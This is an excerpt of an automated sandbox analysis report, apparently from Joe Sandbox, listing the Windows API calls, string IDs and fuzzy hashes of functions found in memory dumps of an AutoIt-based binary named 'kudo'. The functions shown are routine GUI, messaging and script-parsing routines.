                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: 4ab248a4d64389c54247c4b29704d779dbfeadc88dca081b1189842375119453
                                                      • Instruction ID: 0b7f21cbc3ec835fd49521b7c480c926fdfad3b94b779cf6f21cf53914eee285
                                                      • Opcode Fuzzy Hash: 4ab248a4d64389c54247c4b29704d779dbfeadc88dca081b1189842375119453
                                                      • Instruction Fuzzy Hash: 47D15D702043119BCA04FF18C852A6E7BA5FF95754F544468F986DB3A3DB21EE4ACB42
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 0088A630
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0088A661
                                                      • GetSysColor.USER32(0000000F), ref: 0088A66D
                                                      • SetBkColor.GDI32(?,000000FF), ref: 0088A687
                                                      • SelectObject.GDI32(?,00000000), ref: 0088A696
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0088A6C1
                                                      • GetSysColor.USER32(00000010), ref: 0088A6C9
                                                      • CreateSolidBrush.GDI32(00000000), ref: 0088A6D0
                                                      • FrameRect.USER32(?,?,00000000), ref: 0088A6DF
                                                      • DeleteObject.GDI32(00000000), ref: 0088A6E6
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0088A731
                                                      • FillRect.USER32(?,?,00000000), ref: 0088A763
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088A78E
                                                        • Part of subcall function 0088A8CA: GetSysColor.USER32(00000012), ref: 0088A903
                                                        • Part of subcall function 0088A8CA: SetTextColor.GDI32(?,?), ref: 0088A907
                                                        • Part of subcall function 0088A8CA: GetSysColorBrush.USER32(0000000F), ref: 0088A91D
                                                        • Part of subcall function 0088A8CA: GetSysColor.USER32(0000000F), ref: 0088A928
                                                        • Part of subcall function 0088A8CA: GetSysColor.USER32(00000011), ref: 0088A945
                                                        • Part of subcall function 0088A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088A953
                                                        • Part of subcall function 0088A8CA: SelectObject.GDI32(?,00000000), ref: 0088A964
                                                        • Part of subcall function 0088A8CA: SetBkColor.GDI32(?,00000000), ref: 0088A96D
                                                        • Part of subcall function 0088A8CA: SelectObject.GDI32(?,?), ref: 0088A97A
                                                        • Part of subcall function 0088A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0088A999
                                                        • Part of subcall function 0088A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088A9B0
                                                        • Part of subcall function 0088A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0088A9C5
                                                        • Part of subcall function 0088A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0088A9ED
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 3521893082-0
                                                      • Opcode ID: bc35a8e575ecbb4779d9bd09c2d2b7fc8ebc193253c29af5d7576af0715afaa4
                                                      • Instruction ID: c1ee18d28b8a6b71f65fa963b9e5bcc2af3eb41904181bede64871c43b00d52f
                                                      • Opcode Fuzzy Hash: bc35a8e575ecbb4779d9bd09c2d2b7fc8ebc193253c29af5d7576af0715afaa4
                                                      • Instruction Fuzzy Hash: A7918E72008301EFD711AF68DC08A5B7BA9FF89321F104B2AF6A2D61E2D771D944CB52
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 008774DE
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0087759D
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008775DB
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008775ED
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00877633
                                                      • GetClientRect.USER32(00000000,?), ref: 0087763F
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00877683
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00877692
                                                      • GetStockObject.GDI32(00000011), ref: 008776A2
                                                      • SelectObject.GDI32(00000000,00000000), ref: 008776A6
                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 008776B6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 008776BF
                                                      • DeleteDC.GDI32(00000000), ref: 008776C8
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008776F4
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0087770B
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00877746
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0087775A
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0087776B
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0087779B
                                                      • GetStockObject.GDI32(00000011), ref: 008777A6
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008777B1
                                                      • ShowWindow.USER32(00000004), ref: 008777BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: 3fdb891182fcb0531bfcce28941335db5cf2803bb02b9d20fa3feb57103d8f4e
                                                      • Instruction ID: 1b79e9e970e6cc94fceeaa5e585a4d6460b6d533b12ed1752aee751f0882213c
                                                      • Opcode Fuzzy Hash: 3fdb891182fcb0531bfcce28941335db5cf2803bb02b9d20fa3feb57103d8f4e
                                                      • Instruction Fuzzy Hash: 38A12DB1A40615BFEB14DBA8DC4AFAA7BB9FB08710F108114FA15E72E1D774AD40CB64
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0086AD1E
                                                      • GetDriveTypeW.KERNEL32(?,0088FAC0,?,\\.\,0088F910), ref: 0086ADFB
                                                      • SetErrorMode.KERNEL32(00000000,0088FAC0,?,\\.\,0088F910), ref: 0086AF59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 9aaab638523965a3d6e057f0084b5480e5e6eff11bba6c4dc4f8f324bdf3f73b
                                                      • Instruction ID: e12d67b6730968604b07f91ab927668be16ed016a2ca2935f0feff3142ee1bf6
                                                      • Opcode Fuzzy Hash: 9aaab638523965a3d6e057f0084b5480e5e6eff11bba6c4dc4f8f324bdf3f73b
                                                      • Instruction Fuzzy Hash: 78517BB0648209EACB08EB64D993CBDB7A8FF08714B228066E416F7391DE359D01DF53
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 93646922f0f53432fc9ff9bdd44c05d26c9223fb38d36a09645a4fb6709858c3
                                                      • Instruction ID: a9f3f7470e10c0b110cd8f97c0571ae89c535ff20eaf2dc565222809edc5a015
                                                      • Opcode Fuzzy Hash: 93646922f0f53432fc9ff9bdd44c05d26c9223fb38d36a09645a4fb6709858c3
                                                      • Instruction Fuzzy Hash: 228104B0700219AEDF60BA64EC52FAB3768FF15710F040024FD05EA2D6FB64DA65C6A2
                                                      APIs
                                                      • DestroyWindow.USER32 ref: 00802CA2
                                                      • DeleteObject.GDI32(00000000), ref: 00802CE8
                                                      • DeleteObject.GDI32(00000000), ref: 00802CF3
                                                      • DestroyCursor.USER32(00000000), ref: 00802CFE
                                                      • DestroyWindow.USER32(00000000), ref: 00802D09
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0083C43B
                                                      • 69E6E349.COMCTL32(?,000000FF,?), ref: 0083C474
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0083C89D
                                                        • Part of subcall function 00801B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00801B9A
                                                      • SendMessageW.USER32(?,00001053), ref: 0083C8DA
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0083C8F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DestroyMessageSendWindow$DeleteObject$CursorE349InvalidateMoveRect
                                                      • String ID: 0
                                                      • API String ID: 2631842597-4108050209
                                                      • Opcode ID: bfb280ac2fda01ba93afc7c7aef25c98512753484c7306950d180831cd38e05e
                                                      • Instruction ID: 1ded665338ae546c850bc5b2df695159689712401515871b130840a348adb36d
                                                      • Opcode Fuzzy Hash: bfb280ac2fda01ba93afc7c7aef25c98512753484c7306950d180831cd38e05e
                                                      • Instruction Fuzzy Hash: 8C128D30600201EFEB65DF28C888BA9BBE5FF85314F544569F995EB2A2C771EC41CB91
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103), ref: 00889AD2
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00889B8B
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00889BA7
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 2b8a5154e4cdc4062013824ba9241b4cfe15d6d940d991c718f499f9b9babe51
                                                      • Instruction ID: 68c1e9fbe155008b80dccfb0a92e753c3403312334f38d6bef118953b642449d
                                                      • Opcode Fuzzy Hash: 2b8a5154e4cdc4062013824ba9241b4cfe15d6d940d991c718f499f9b9babe51
                                                      • Instruction Fuzzy Hash: 5302BF30104201AFE729EF18C849BBABBE5FF49314F08462DFAD9D62A1D775D944CB52
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 0088A903
                                                      • SetTextColor.GDI32(?,?), ref: 0088A907
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0088A91D
                                                      • GetSysColor.USER32(0000000F), ref: 0088A928
                                                      • CreateSolidBrush.GDI32(?), ref: 0088A92D
                                                      • GetSysColor.USER32(00000011), ref: 0088A945
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088A953
                                                      • SelectObject.GDI32(?,00000000), ref: 0088A964
                                                      • SetBkColor.GDI32(?,00000000), ref: 0088A96D
                                                      • SelectObject.GDI32(?,?), ref: 0088A97A
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0088A999
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088A9B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0088A9C5
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0088A9ED
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0088AA14
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0088AA32
                                                      • DrawFocusRect.USER32(?,?), ref: 0088AA3D
                                                      • GetSysColor.USER32(00000011), ref: 0088AA4B
                                                      • SetTextColor.GDI32(?,00000000), ref: 0088AA53
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0088AA67
                                                      • SelectObject.GDI32(?,0088A5FA), ref: 0088AA7E
                                                      • DeleteObject.GDI32(?), ref: 0088AA89
                                                      • SelectObject.GDI32(?,?), ref: 0088AA8F
                                                      • DeleteObject.GDI32(?), ref: 0088AA94
                                                      • SetTextColor.GDI32(?,?), ref: 0088AA9A
                                                      • SetBkColor.GDI32(?,?), ref: 0088AAA4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: acfde702c0edeb5a0763ce1e37dd4000dd0acbaa0fa47182b3df4b4a1826d203
                                                      • Instruction ID: 69e9e9da768e8a1410f049a82d1915d89fa2293f5bdb211c0177e05359d08ba3
                                                      • Opcode Fuzzy Hash: acfde702c0edeb5a0763ce1e37dd4000dd0acbaa0fa47182b3df4b4a1826d203
                                                      • Instruction Fuzzy Hash: 6E512E75901218EFDB119FA8DC48EAE7B79FF08320F114626FA11EB2A2D7759940DF50
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00888AC1
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00888AD2
                                                      • CharNextW.USER32(0000014E), ref: 00888B01
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00888B42
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00888B58
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00888B69
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00888B86
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00888BD8
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00888BEE
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00888C1F
                                                      • _memset.LIBCMT ref: 00888C44
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00888C8D
                                                      • _memset.LIBCMT ref: 00888CEC
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00888D16
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00888D6E
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00888E1B
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00888E3D
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00888E87
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00888EB4
                                                      • DrawMenuBar.USER32(?), ref: 00888EC3
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00888EEB
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: 02ec915a1aaf43f381c13b7c0d3854164a28897f6a36b3804996973ea4cd86c0
                                                      • Instruction ID: 92de10854ed4734378ecca118249076f64553348cbcd70c3b31be8cfdd00b29d
                                                      • Opcode Fuzzy Hash: 02ec915a1aaf43f381c13b7c0d3854164a28897f6a36b3804996973ea4cd86c0
                                                      • Instruction Fuzzy Hash: 47E14C74900218EADB20EF54CC84EEE7BB9FF05720F50815AFA15EA291DB749980DF61
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 008849CA
                                                      • GetDesktopWindow.USER32 ref: 008849DF
                                                      • GetWindowRect.USER32(00000000), ref: 008849E6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00884A48
                                                      • DestroyWindow.USER32(?), ref: 00884A74
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00884A9D
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00884ABB
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00884AE1
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00884AF6
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00884B09
                                                      • IsWindowVisible.USER32(?), ref: 00884B29
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00884B44
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00884B58
                                                      • GetWindowRect.USER32(?,?), ref: 00884B70
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00884B96
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00884BB0
                                                      • CopyRect.USER32(?,?), ref: 00884BC7
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00884C32
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: aa10892e476575e8d0287f2a3cdfef7a16e189d915e374387b61fe0e1188a134
                                                      • Instruction ID: 6483b6cf7c3bebc3dc8c99327acda86cf556ee9d2a5ffefd030773312bcd0766
                                                      • Opcode Fuzzy Hash: aa10892e476575e8d0287f2a3cdfef7a16e189d915e374387b61fe0e1188a134
                                                      • Instruction Fuzzy Hash: 88B17B72604351AFDB44EF68C845B6ABBE4FF88314F008A1CF599DB2A2D771E805CB56
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008028BC
                                                      • GetSystemMetrics.USER32(00000007), ref: 008028C4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008028EF
                                                      • GetSystemMetrics.USER32(00000008), ref: 008028F7
                                                      • GetSystemMetrics.USER32(00000004), ref: 0080291C
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00802939
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00802949
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0080297C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00802990
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 008029AE
                                                      • GetStockObject.GDI32(00000011), ref: 008029CA
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 008029D5
                                                        • Part of subcall function 00802344: GetCursorPos.USER32(?), ref: 00802357
                                                        • Part of subcall function 00802344: ScreenToClient.USER32(008C57B0,?), ref: 00802374
